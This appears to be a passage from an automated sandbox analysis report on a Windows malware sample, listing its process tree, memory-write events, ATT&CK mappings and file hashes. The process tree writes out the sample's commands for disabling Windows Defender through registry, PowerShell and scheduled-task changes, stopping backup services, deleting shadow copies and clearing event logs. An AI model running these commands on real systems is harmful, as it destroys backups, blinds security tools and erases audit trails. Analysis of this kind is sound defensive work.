SeIncBasePriorityPrivilege 320 wmic.exe Token: SeCreatePagefilePrivilege 320 wmic.exe Token: SeBackupPrivilege 320 wmic.exe Token: SeRestorePrivilege 320 wmic.exe Token: SeShutdownPrivilege 320 wmic.exe Token: SeDebugPrivilege 320 wmic.exe Token: SeSystemEnvironmentPrivilege 320 wmic.exe Token: SeRemoteShutdownPrivilege 320 wmic.exe Token: SeUndockPrivilege 320 wmic.exe Token: SeManageVolumePrivilege 320 wmic.exe Token: 33 320 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2356 wrote to memory of 2320 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 31 PID 2356 wrote to memory of 2320 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 31 PID 2356 wrote to memory of 2320 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 31 PID 2356 wrote to memory of 2320 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 31 PID 2320 wrote to memory of 2340 2320 net.exe 33 PID 2320 wrote to memory of 2340 2320 net.exe 33 PID 2320 wrote to memory of 2340 2320 net.exe 33 PID 2320 wrote to memory of 2340 2320 net.exe 33 PID 2356 wrote to memory of 1228 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 34 PID 2356 wrote to memory of 1228 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 34 PID 2356 wrote to memory of 1228 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 34 PID 2356 wrote to memory of 1228 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 34 PID 1228 wrote to memory of 2836 1228 net.exe 36 PID 1228 wrote to memory of 2836 1228 net.exe 36 PID 1228 wrote to memory of 2836 1228 net.exe 36 PID 1228 wrote to memory of 2836 1228 net.exe 36 PID 2356 wrote to memory of 1096 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 37 PID 2356 wrote to memory of 1096 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 37 PID 2356 wrote to memory of 1096 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 37 PID 2356 wrote to memory of 1096 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 37 PID 1096 wrote to memory of 2516 1096 net.exe 39 PID 1096 wrote to memory of 2516 1096 net.exe 39 PID 1096 wrote to memory of 2516 1096 net.exe 39 PID 1096 wrote to memory of 2516 1096 net.exe 39 PID 2356 wrote to memory of 1712 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 40 PID 2356 wrote to memory of 1712 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 40 PID 2356 wrote to memory of 1712 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 40 PID 2356 wrote to memory of 1712 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 40 PID 1712 wrote to memory of 2060 1712 net.exe 42 PID 1712 wrote to memory of 2060 1712 net.exe 42 PID 1712 wrote to memory of 2060 1712 net.exe 42 PID 1712 wrote to memory of 2060 1712 net.exe 42 PID 2356 wrote to memory of 1996 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 43 PID 2356 wrote to memory of 1996 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 43 PID 2356 wrote to memory of 1996 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 43 PID 2356 wrote to memory of 1996 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 43 PID 1996 wrote to memory of 1276 1996 net.exe 45 PID 1996 wrote to memory of 1276 1996 net.exe 45 PID 1996 wrote to memory of 1276 1996 net.exe 45 PID 1996 wrote to memory of 1276 1996 net.exe 45 PID 2356 wrote to memory of 2164 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 46 PID 2356 wrote to memory of 2164 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 46 PID 2356 wrote to memory of 2164 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 46 PID 2356 wrote to memory of 2164 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 46 PID 2164 wrote to memory of 1992 2164 net.exe 48 PID 2164 wrote to memory of 1992 2164 net.exe 48 PID 2164 wrote to memory of 1992 2164 net.exe 48 PID 2164 wrote to memory of 1992 2164 net.exe 48 PID 2356 wrote to memory of 2012 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 49 PID 2356 wrote to memory of 2012 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 49 PID 2356 wrote to memory of 2012 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 49 PID 2356 wrote to memory of 2012 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 49 PID 2012 wrote to memory of 2688 2012 net.exe 51 PID 2012 wrote to memory of 2688 2012 net.exe 51 PID 2012 wrote to memory of 2688 2012 net.exe 51 PID 2012 wrote to memory of 2688 2012 net.exe 51 PID 2356 wrote to memory of 2784 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 52 PID 2356 wrote to memory of 2784 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 52 PID 2356 wrote to memory of 2784 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 52 PID 2356 wrote to memory of 2784 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe 52 PID 2784 wrote to memory of 2816 2784 net.exe 54 PID 2784 wrote to memory of 2816 2784 net.exe 54 PID 2784 wrote to memory of 2816 2784 net.exe 54 PID 2784 wrote to memory of 2816 2784 net.exe 54 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:2836
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:2516
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵
- System Location Discovery: System Language Discovery
PID:1276
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:1992
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2780
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2940
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2220
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1404
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:2576
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:1268
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2472
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2040
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1984
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1728
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1936
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2872
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2548
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:1908
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1108
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1740
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1460
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:448
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:852
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1772
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1360
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:356
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1640
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:620
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:1036
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1368
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1852
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵
- System Location Discovery: System Language Discovery
PID:2308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:1752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Impair Defenses
3Disable or Modify Tools
1Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51ca4bccdc072b810cb3f0080d616317a
SHA180dea435c073d9b0a2a54a853df4dc058ebd3352
SHA25648f9f649dfdf74a453d0229070bfdadd27c93e014f56cf36992758b70350e169
SHA512fcacc4812f6cd93cb91a5e502fe3571eefba692defdd52f67b55cad3790405535ff156ba87360dcccd86e0766e03ddbd6a1c547b7cd40d1f32ccf7e51dfc4488
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD59351dc1cca57491d8198da5e787b0e77
SHA19f7659f7525ba923c6868ce1ec2e32ea81ac35ed
SHA256abf7d6e8f34e854ea9a5127bc76bab4ea26b6e96ce64c41b9042f908ad0472f3
SHA5125760f4ac69a2343ea6174f77588e9494e19ca0f37bbc68c00066420c364c02c002596714889b8dcaf3b3aaf57ef3140510d0b6d9839479e2b0d7cbdf6ae27ec6